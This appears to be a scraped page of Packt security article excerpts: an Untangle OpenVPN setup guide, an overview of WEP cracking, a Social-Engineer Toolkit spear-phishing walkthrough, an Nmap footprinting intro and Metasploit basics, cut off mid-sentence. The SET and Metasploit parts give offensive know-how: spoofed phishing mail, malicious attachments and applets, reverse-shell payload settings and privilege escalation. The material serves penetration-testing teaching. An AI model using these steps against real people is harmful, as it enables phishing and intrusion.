OpenVPN connect for iOS is available at https://itunes.apple.com/us/app/openvpn-connect/id590379981?mt=8 OpenVPN for Android 4.0+ is available at https://play.google.com/store/apps/details?id=net.openvpn.openvpn Log in to the Untangle NGFW server, download the .zip client configuration file, and extract the files from the .zip file. Place the configuration files into any of the following OpenVPN-compatible applications: Tunnelblick: Manually copy the files into the Configurations folder located at ~/Library/Application Support/Tunnelblick. Linux: Copy the extracted files into /etc/openvpn, and then you can connect using sudo openvpn /etc/openvpn/<Site_name>.conf. iOS: Open iTunes and select the files from the config ZIP file to add to the app on your iPhone or iPad. Android: From OpenVPN for an Android application, click on all your precious VPNs. In the top-right corner, click on the folder, and then browse to the folder where you have the OpenVPN .Conf file. Click on the file and hit Select. Then, in the top-right corner, hit the little floppy disc icon to save the import. Now, you should see the imported profile. Click on it to connect to the tunnel. For more information on this, visit http://forums.untangle.com/openvpn/30472-openvpn-android-4-0-a.html. Run the OpenVPN-compatible client. Using OpenVPN for site-to-site connection To use OpenVPN for site-to-site connection, one Untangle NGFW server will run on the OpenVPN server mode, and the other server will run on the client mode. We will need to create a client that will be imported in the remote server. The client settings are shown in the following screenshot: We will need to download the client configuration that is supposed to be imported on another Untangle server (the third option available on the client download menu), and then import this client configuration's zipped file on the remote server. To import the client, on the remote server under the Client tab, browse to the .zip file and press the Submit button. The client will be shown as follows: You'll need to restart the two servers before being able to use the OpenVPN site-to-site connection. The site-to-site connection is bidirectional. Reviewing the connection details The current connected clients (either they were OS clients or another Untangle NGFW client) will appear under Connected Remote Clients located under the Status tab. The screen will show the client name, its external address, and the address assigned to it by OpenVPN. In addition to the connection start time, the amount of transmitted and received MB during this connection is also shown: For the site-to-site connection, the client server will show the name of the remote server, whether the connection is established or not, in addition to the amount of transmitted and received data in MB: Event logs show a detailed connection history as shown in the following screenshot: In addition, there are two reports available for Untangle's OpenVPN: Bandwidth usage: This report shows the maximum and average data transfer rate (KB/s) and the total amount of data transferred that day Top users: This report shows the top users connected to the Untangle OpenVPN server Troubleshooting Untangle's OpenVPN In this section, we will discuss some points to consider when dealing with Untangle NGFW OpenVPN. OpenVPN acts as a router as it will route between different networks. Using OpenVPN with Untangle NGFW in the bridge mode (Untangle NGFW server is behind another router) requires additional configurations. The required configurations are as follows: Create a static route on the router that will route any traffic from the VPN range (the VPN address pool) to the Untangle NGFW server. Create a Port Forward rule for the OpenVPN port 1194 (UDP) on the router to Untangle NGFW. Verify that your setting is correct by going to Config | Administration | Public Address as it is used by Untangle to configure OpenVPN clients, and ensure that the configured address is resolvable from outside the company. If the OpenVPN client is connected, but you can't access anything, perform the following steps: Verify that the hosts you are trying to reach are exported in Exported Networks. Try to ping Untangle NGFW LAN IP address (if exported). Try to bring up the Untangle NGFW GUI by entering the IP address in a browser. If the preceding tasks work, your tunnel is up and operational. If you can't reach any clients inside the network, check for the following conditions: The client machine's firewall is not preventing the connection from the OpenVPN client. The client machine uses Untangle as a gateway or has a static route to send the VPN address pool to Untangle NGFW. In addition, some port forwarding rules on Untangle NGFW are needed for OpenVPN to function properly. The required ports are 53, 445, 389, 88, 135, and 1025. If the site-to-site tunnel is set up correctly, but the two sites can't talk to each other, the reason may be as follows: If your sites have IPs from the same subnet (this probably happens when you use a service from the same ISP for both branches), OpenVPN may fail as it consider no routing is needed from IPs in the same subnet, you should ask your ISP to change the IPs. To get DNS resolution to work over the site-to-site tunnel, you'll need to go to Config | Network | Advanced | DNS Server | Local DNS Servers and add the IP of the DNS server on the far side of the tunnel. Enter the domain in the Domain List column and use the FQDN when accessing resources. You'll need to do this on both sides of the tunnel for it to work from either side. If you are using site-to-site VPN in addition to the client-to-site VPN. However, the OpenVPN client is able to connect to the main site only: You'll need to add VPN Address Pool to Exported Hosts and Networks Lab-based training This section will provide training for the OpenVPN site-to-site and client-to-site scenarios. In this lab, we will mainly use Untangle-01, Untangle-03, and a laptop (192.168.1.7). The ABC bank started a project with Acme schools. As a part of this project, the ABC bank team needs to periodically access files located on Acme-FS01. So, the two parties decided to opt for OpenVPN. However, Acme's network team doesn't want to leave access wide open for ABC bank members, so they set firewall rules to limit ABC bank's access to the file server only. In addition, the IT team director wants to have VPN access from home to the Acme network, which they decided to accomplish using OpenVPN. The following diagram shows the environment used in the site-to-site scenario: To create the site-to-site connection, we will need to do the following steps: Enable OpenVPN Server on Untangle-01. Create a network type client with a remote network of 172.16.1.0/24. Download the client and import it under the Client tab in Untangle-03. Restart the two servers. After the restart, you have a site-to-site VPN connection. However, the Acme network is wide open to the ABC bank, so we need to create a firewall-limiting rule. On Untangle-03, create a rule that will allow any traffic that comes from the OpenVPN interface, and its source is 172.16.136.10 (Untangle-01 Client IP) and is directed to 172.16.1.7 (Acme-FS01). The rule is shown in the following screenshot: Also, we will need a general block rule that comes after the preceding rule in the rule evaluation order. The environment used for the client-to-site connection is shown in the following diagram: To create a client-to-site VPN connection, we need to perform the following steps: Enable the OpenVPN server on Untangle-03. Create an individual client type client on Untangle-03. Distribute the client to the intended user (that is 192.168.1.7). Install OpenVPN on your laptop. Connect using the installed OpenVPN and try to ping Acme-DC01 using its name. The ping will fail because the client is not able to query the Acme DNS. So, in the Default Group settings, change Push DNS Domain to Acme.local. Changing the group settings will not affect the OpenVPN client till the client is restarted. Now, the ping process will be a success. Summary In this article, we covered the VPN services provided by Untangle NGFW. We went deeply into understanding how each solution works. This article also provided a guide on how to configure and deploy the services. Untangle provides a free solution that is based on the well-known open source OpenVPN, which provides an SSL-based VPN. Resources for Article: Further resources on this subject: Important Features of Gitolite [Article] Target Exploitation [Article] IPv6 on Packet Tracer [Article]
Read more
  • 0
  • 0
  • 18642

article-image-what-we-can-learn-attacks-wep-protocol
Packt
12 Aug 2015
4 min read
Save for later

What we can learn from attacks on the WEP Protocol

Packt
12 Aug 2015
4 min read
In the past years, many types of attacks on the WEP protocol have been undertaken. Being successful with such an attack is an important milestone for anyone who wants to undertake penetration tests of wireless networks. In this article by Marco Alamanni, the author of Kali Linux Wireless Penetration Testing Essentials, we will take a look at the basics and the most common types of WEP protocols. What is the WEP protocol? The WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the Rivest Cipher 4 (RC4) stream cypher with a Pre-shared Secret Key (PSK) of 40 or 104 bits, depending on the implementation. A 24-bit pseudorandom Initialization Vector (IV) is concatenated with the pre-shared key to generate the per-packet keystream used by RC4 for the actual encryption and decryption process. Thus, the resulting keystream could be 64 or 128 bits long. In the encryption phase, the keystream is encrypted with the XOR cypher with the plaintext data to obtain the encrypted data. While in the decryption phase, the encrypted data is XOR-encrypted with the keystream to obtain the plaintext data. The encryption process is shown in the following diagram: Attacks against WEP and why do they occur? WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, to the use of IVs (initialization vectors), and to the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose has not been accomplished in the design of WEP because the IV is only 24 bits long (with 2^24 =16,777,216 possible values) and it is transmitted in clear text within each frame. Thus, after a certain period of time (depending on the network traffic), the same IV and consequently the same keystream will be reused, allowing the attacker to collect the relative cypher texts and perform statistical attacks to recover plain texts and the key. FMS attacks on WEP The first well-known attack against WEP was the Fluhrer, Mantin, and Shamir (FMS) attack back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IV to generate weak keystreams, making it possible for an attacker to collect a sufficient number of packets encrypted with these keys, to analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack has been enhanced by Korek, improving its performance. Andreas Klein found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, which can be used to crack the WEP key. PTW attacks on WEP In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs such as the FMS attack does and is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50% using less than 40,000 frames and with a probability of 95% with 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys. ARP Request replay attacks on WEP Both FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel of the target AP and capturing frames. The problem is that, in normal conditions, we will have to spend quite a long time to passively collect all the necessary packets for the attacks, especially with the FMS attack. To accelerate the process, the idea is to reinject frames in the network to generate traffic in response so that we can collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request because the AP broadcasts it, each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack. Find out more to become a master penetration tester by reading Kali Linux Wireless Penetration Testing Essentials
Read more
  • 0
  • 0
  • 18105
article-image-social-engineer-toolkit
Packt
25 Oct 2013
11 min read
Save for later

Social-Engineer Toolkit

Packt
25 Oct 2013
11 min read
(For more resources related to this topic, see here.) Social engineering is an act of manipulating people to perform actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked to reveal his/her login information by sending a fake login/phishing page. The Social-Engineer Toolkit is designed to perform such tricking activities. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspect of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering. Getting started with the Social-Engineer Toolkit (SET) Let's start our introductory recipe about SET, where we will be discussing SET on different platforms. Getting ready SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article. How to do it... To launch SET on BackTrack, start the terminal window and pass the following path: root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Copyright 2012, The Social-Engineer Toolkit (SET) All rights reserved. Select from the menu: If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use. The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit. How it works... SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET. There's more... Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps: You should remove the old SET using the following command: dpkg –r set We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, making sure we are in the directory and then opt for the 'rm' command for removing all files present there. Or, we can use the method shown previously. Then, for reinstallation, we can download its clone using the following command: Git clone https://github.com/trustedsec/social-engineer-toolkit /set Working with the SET config file In this recipe, we will take a close look at the SET config file, which contains default values for different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file. Getting ready To launch the config file, move to the config file and open the set_config file: root@bt:/pentest/exploits/set# nano config/set_config The configuration file will be launched with some introductory statements, as shown in the following screenshot: How to do it... Let's go through it step-by-step: First, we will see what configuration settings are available for us: # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/pentest/exploits/framework3 The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework: # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap Ettercap is a multipurpose sniffer for switched LAN. Ettercap section can be used to perform LAN attacks like DNS poisoning, spoofing etc. The above SET setting can be used to either set ettercap ON of OFF depending upon the usability. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF. The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack: # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF We will discuss this attack vector in detail in a later recipe, that is, the Spear phishing attack vector . This attack vector will also require JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail: SELF_SIGNED_APPLET=ON # AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/Port forwarding, and it allows you to connect to the external Internet. The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance: # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF: # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user: # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! # SELF_SIGNED_CERT=OFF The following setting is used to enable or disable the Metasploit listener once the attack is executed: # DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A METASPLOIT LISTENER IN THE BACKGROUND. AUTOMATIC_LISTENER=ON The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance: # THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS # OR THE OTHER ATTACK VECTORS. METASPLOIT_MODE=ON These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the SET. How it works... The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file. Working with the spear-phishing attack vector A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command: root@bt:~# apt-get install sendmail Reading package lists... Done Getting ready Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works. Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF records validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <richyrich@gmail.com>, arrives from the IP 202.145.34.23, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list. As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible. Spear-phishing attacks are of two types—web-based content and payload-based content. How to do it... The spear-phishing module has three different attack vectors at our disposal: Let's analyze each of them. Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options will include setting the vnc server or executing the payload and starting the command line, and so on. The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack: Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server: 1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing>1 set:phishing> From address (ex: moo@example.com):bigmoney@gmail.com set:phishing> Flag this message/s as high priority? [yes|no]:y Setting up your own server cannot be very reliable, as most of the mail services follow a reverse lookup to make sure that the e-mail has generated from the same domain name as the address name. Let's analyze another attack vector of spear-fishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as they are difficult to detect whether they are malicious or not, so they can be sent as an attachment via an e-mail: set:phishing> Setup a listener [yes|no]:y [-] *** [-] * WARNING: Database support has been disabled [-] *** At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential. How it works... As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail will contain a malicious attachment, which will exploit a known vulnerability on the target machine and provide a shell connectivity to the attacker. The SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
Read more
  • 0
  • 0
  • 17989

article-image-information-gathering-and-vulnerability-assessment-0
Packt
08 Nov 2016
7 min read
Save for later

Information Gathering and Vulnerability Assessment

Packt
08 Nov 2016
7 min read
In this article by Wolf Halton and Bo Weaver, the authors of the book Kali Linux 2: Windows Penetration Testing, we try to debunk the myth that all Windows systems are easy to exploit. This is not entirely true. Almost any Windows system can be hardened to the point that it takes too long to exploit its vulnerabilities. In this article, you will learn the following: How to footprint your Windows network and discover the vulnerabilities before the bad guys do Ways to investigate and map your Windows network to find the Windows systems that are susceptible to exploits (For more resources related to this topic, see here.) In some cases, this will be adding to your knowledge of the top 10 security tools, and in others, we will show you entirely new tools to handle this category of investigation. Footprinting the network You can't find your way without a good map. In this article, we are going to learn how to gather network information and assess the vulnerabilities on the network. In the Hacker world this is called Footprinting. This is the first step to any righteous hack. This is where you will save yourself time and massive headaches. Without Footprinting your targets, you are just shooting in the dark. The biggest tool in any good pen tester's toolbox is Mindset. You have to have the mind of a sniper. You learn your targets habits and its actions. You learn the traffic flows on the network where your target lives. You find the weaknesses in your target and then attack those weaknesses. Search and destroy! In order to do good Footprinting, you have to use several tools that come with Kali. Each tool has it strong points and looks at the target from a different angle. The more views you have of your target, the better plan of attack you have. Footprinting will differ depending on whether your targets are external on the public network, or internal and on a LAN. We will be covering both aspects. Please read the paragraph above again, and remember you do not have our permission to attack these machines. Don't do the crime if you can't do the time. Exploring the network with Nmap You can't talk about networking without talking about Nmap. Nmap is the Swiss Army knife for network administrators. It is not only a great Footprinting tool, but also the best and cheapest network analysis tool any sysadmin can get. It's a great tool for checking a single server to make sure the ports are operating properly. It can heartbeat and ping an entire network segment. It can even discover machines when ICMP (ping) has been turned off. It can be used to pressure-test services. If the machine freezes under the load, it needs repairs. Nmap was created in 1997 by Gordon Lyon, who goes by the handle Fyodor on the Internet. Fyodor still maintains Nmap and it can be downloaded from http://insecure.org. You can also order his book Nmap Network Scanning on that website. It is a great book, well worth the price! Fyodor and the Nmap hackers have collected a great deal of information and security e-mail lists on their site. Since you have Kali Linux, you have a full copy of Nmap already installed! Here is an example of Nmap running against a Kali Linux instance. Open the terminal from the icon on the top bar or by clicking on the menu link Application | Accessories | Terminal. You could also choose the Root Terminal if you want, but since you are already logged in as Root, you will not see any differences in how the terminal emulator behaves. Type nmap -A 10.0.0.4 at the command prompt (you need to put in the IP of the machine you are testing). The output shows the open ports among 1000 commonly used ports. Kali Linux, by default, has no running network services, and so in this run you will see a readout showing no open ports. To make it a little more interesting, start the built-in webserver by typing /etc/init.d/apache2 start. With the web server started, run the Nmap command again: nmap -A 10.0.0.4 As you can see, Nmap is attempting to discover the operating system (OS) and to tell which version of the web server is running: Here is an example of running Nmap from the Git Bash application, which lets you run Linux commands on your Windows desktop. This view shows a neat feature of Nmap. If you get bored or anxious and think the system is taking too much time to scan, you can hit the down arrow key and it will print out a status line to tell you what percentage of the scan is complete. This is not the same as telling you how much time is left on the scan, but it does give you an idea what has been done: Zenmap Nmap comes with a GUI frontend called Zenmap. Zenmap is a friendly graphic interface for the Nmap application. You will find Zenmap under Applications | Information Gathering | Zenmap. Like many Windows engineers, you may like Zenmap more than Nmap: Here we see a list of the most common scans in a drop-down box. One of the cool features of Zenmap is when you set up a scan using the buttons, the application also writes out the command-line version of the command, which will help you learn the command-line flags used when using Nmap in command-line mode. Hacker tip Most hackers are very comfortable with the Linux Command Line Interface (CLI). You want to learn the Nmap commands on the command line because you can use Nmap inside automated Bash scripts and make up cron jobs to make routine scans much simpler. You can set a cron job to run the test in non-peak hours, when the network is quieter, and your tests will have less impact on the network's legitimate users. The choice of intense scan produces a command line of nmap -T4 -A -v. This produces a fast scan. The T stands for Timing (from 1 to 5), and the default timing is -T3. The faster the timing, the rougher the test, and the more likely you are to be detected if the network is running an Intrusion Detection System (IDS). The -A stands for All, so this single option gets you a deep port scan, including OS identification, and attempts to find the applications listening on the ports, and the versions of those applications.  Finally, the -v stands for verbose. -vv means very verbose: Summary In this article, we learned about penetration testing in a Windows environment. Contrary to popular belief, Windows is not riddled with wide-open security holes ready for attackers to find. We learned how to use nmap to obtain detailed statistics about the network, making it an indispensible tool in our pen testing kit. Then, we looked at Zenmap, which is a GUI frontend for nmap and makes it easy for us to view the network. Think of nmap as flight control using audio transmissions and Zenmap as a big green radar screen—that's how much easier it makes our work. Resources for Article: Further resources on this subject: Bringing DevOps to Network Operations [article] Installing Magento [article] Zabbix Configuration [article]
Read more
  • 0
  • 0
  • 17476

article-image-getting-started-metasploit
Packt
22 Jun 2017
10 min read
Save for later

Getting Started with Metasploit

Packt
22 Jun 2017
10 min read
In this article by Nipun Jaswal, the author of the book Metasploit Bootcamp, we will be covering the following topics: Fundamentals of Metasploit Benefits of using Metasploit (For more resources related to this topic, see here.) Penetration testing is an art of performing a deliberate attack on a network, web application, server or any device that require a thorough check up from the security perspective. The idea of a penetration test is to uncover flaws while simulating real world threats. A penetration test is performed to figure out vulnerabilities and weaknesses in the systems so that vulnerable systems can stay immune to threats and malicious activities. Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered as one of the most practical tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, a great exploit development environment, information gathering and web testing capabilities, and much more. The fundamentals of Metasploit Now that we have completed the setup of Kali Linux let us talk about the big picture: Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid a penetration tester. Metasploit was created by H.D Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a great deal of exploits, payloads, encoding techniques, and loads of post-exploitation features. Metasploit comes in various editions, as follows: Metasploit pro: This edition is a commercial edition, offers tons of great features such as web application scanning and exploitation, automated exploitation and is quite suitable for professional penetration testers and IT security teams. Pro edition is used for advanced penetration tests and enterprise security programs. Metasploit express: The Express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams to small to medium size companies. Metasploit community: This is a free version with reduced functionalities of the express edition. However, for students and small businesses, this edition is a favorable choice. Metasploit framework: This is a command-line version with all manual tasks such as manual exploitation, third-party import, and so on. This release is entirely suitable for developers and security researchers. You can download Metasploit from the following link: https://www.rapid7.com/products/metasploit/download/editions/ We will be using the Metasploit community and framework version.Metasploit also offers various types of user interfaces, as follows: The graphical user interface(GUI): This has all the options available at a click of a button. This interface offers a user-friendly interface that helps to provide a cleaner vulnerability management. The console interface: This is the most preferred interface and the most popular one as well. This interface provides an all in one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. The command-line interface: This is the more potent interface that supports the launching of exploits to activities such as payload generation. However, remembering each and every command while using the command-line interface is a difficult job. Armitage: Armitage by Raphael Mudge added a neat hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortanascripting language. Basics of Metasploit framework Before we put our hands onto the Metasploit framework, let us understand basic terminologies used in Metasploit. However, the following modules are not just terminologies but modules that are heart and soul of the Metasploit project: Exploit: This is a piece of code, which when executed, will trigger the vulnerability at the target. Payload: This is a piece of code that runs at the target after a successful exploitation is done. It defines the type of access and actions we need to gain on the target system. Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more. Encoder: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall. Meterpreter: This is a payload that uses in-memory stagers based on DLL injections. It provides a variety of functions to perform at the target, which makes it a popular choice. Architecture of Metasploit Metasploit comprises of various components such as extensive libraries, modules, plugins, and tools. A diagrammatic view of the structure of Metasploit is as follows: Let's see what these components are and how they work. It is best to start with the libraries that act as the heart of Metasploit. Let's understand the use of various libraries as explained in the following table: Library name Uses REX Handles almost all core functions such as setting up sockets, connections, formatting, and all other raw functions MSF CORE Provides the underlying API and the actual core that describes the framework MSF BASE Provides friendly API support to modules We have many types of modules in Metasploit, and they differ regarding their functionality. We have payload modules for creating access channels to exploited systems. We have auxiliary modules to carry out operations such as information gathering, fingerprinting, fuzzing an application, and logging into various services. Let's examine the basic functionality of these modules, as shown in the following table: Module type Working Payloads Payloads are used to carry out operations such as connecting to or from the target system after exploitation or performing a particular task such as installing a service and so on. Payload execution is the next step after the system is exploited successfully. Auxiliary Auxiliary modules are a special kind of module that performs specific tasks such as information gathering, database fingerprinting, scanning the network to find a particular service and enumeration, and so on. Encoders Encoders are used to encode payloads and the attack vectors to (or intending to) evade detection by antivirus solutions or firewalls. NOPs NOP generators are used for alignment which results in making exploits stable. Exploits The actual code that triggers a vulnerability Metasploit framework console and commands Gathering knowledge of the architecture of Metasploit, let us now run Metasploit to get a hands-on knowledge about the commands and different modules. To start Metasploit, we first need to establish database connection so that everything we do can be logged into the database. However, usage of databases also speeds up Metasploit's load time by making use of cache and indexes for all modules. Therefore, let us start the postgresql service by typing in the following command at the terminal: root@beast:~# service postgresql start Now, to initialize Metasploit's database let us initialize msfdb as shown in the following screenshot: It is clearly visible in the preceding screenshot that we have successfully created the initial database schema for Metasploit. Let us now start the Metasploit's database using the following command: root@beast:~# msfdb start We are now ready to launch Metasploit. Let us issue msfconsole in the terminal to startMetasploit as shown in the following screenshot: Welcome to the Metasploit console, let us run the help command to see what other commands are available to us: The commands in the preceding screenshot are core Metasploit commands which are used to set/get variables, load plugins, route traffic, unset variables, printing version, finding the history of commands issued, and much more. These commands are pretty general. Let's see module based commands as follows: Everything related to a particular module in Metasploit comes under module controls section of the Help menu. Using the preceding commands, we can select a particular module, load modules from a particular path, get information about a module, show core, and advanced options related to a module and even can edit a module inline. Let us learn some basic commands in Metasploit and familiarize ourselves to the syntax and semantics of these commands: Command Usage Example use [auxiliary/exploit/payload/encoder] To select a particular msf>use exploit/unix/ftp/vsftpd_234_backdoor msf>use auxiliary/scanner/portscan/tcp show[exploits/payloads/encoder/auxiliary/options] To see the list of available modules of a particular type msf>show payloads msf> show options set [options/payload] To set a value to a particular object msf>set payload windows/meterpreter/reverse_tcp msf>set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112 msf> set LPORT 4444 msf> set RPORT 8080 setg [options/payload] To assign a value to a particular object globally, so the values do not change when a module is switched on msf>setgRHOST 192.168.10.112 run To launch an auxiliary module after all the required options are set msf>run exploit To launch an exploit msf>exploit back To unselect a module and move back msf(ms08_067_netapi)>back msf> Info To list the information related to a particular exploit/module/auxiliary msf>info exploit/windows/smb/ms08_067_netapi msf(ms08_067_netapi)>info Search To find a particular module msf>search hfs check To check whether a particular target is vulnerable to the exploit or not msf>check Sessions To list the available sessions msf>sessions [session number]   Meterpreter commands Usage Example sysinfo To list system information of the compromised host meterpreter>sysinfo ifconfig To list the network interfaces on the compromised host meterpreter>ifconfig meterpreter>ipconfig (Windows) Arp List of IP and MAC addresses of hosts connected to the target meterpreter>arp background To send an active session to background meterpreter>background shell To drop a cmd shell on the target meterpreter>shell getuid To get the current user details meterpreter>getuid getsystem To escalate privileges and gain system access meterpreter>getsystem getpid To gain the process id of the meterpreter access meterpreter>getpid ps To list all the processes running at the target meterpreter>ps If you are using Metasploit for the very first time, refer to http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commandsfor more information on basic commands Benefits of using Metasploit Metasploit is an excellent choice when compared to traditional manual techniques because of certain factors which are listed as follows: Metasploit framework is open source Metasploit supports large testing networks by making use of CIDR identifiers Metasploit offers quick generation of payloads which can be changed or switched on the fly Metasploit leaves the target system stable in most of the cases The GUI environment provides a fast and 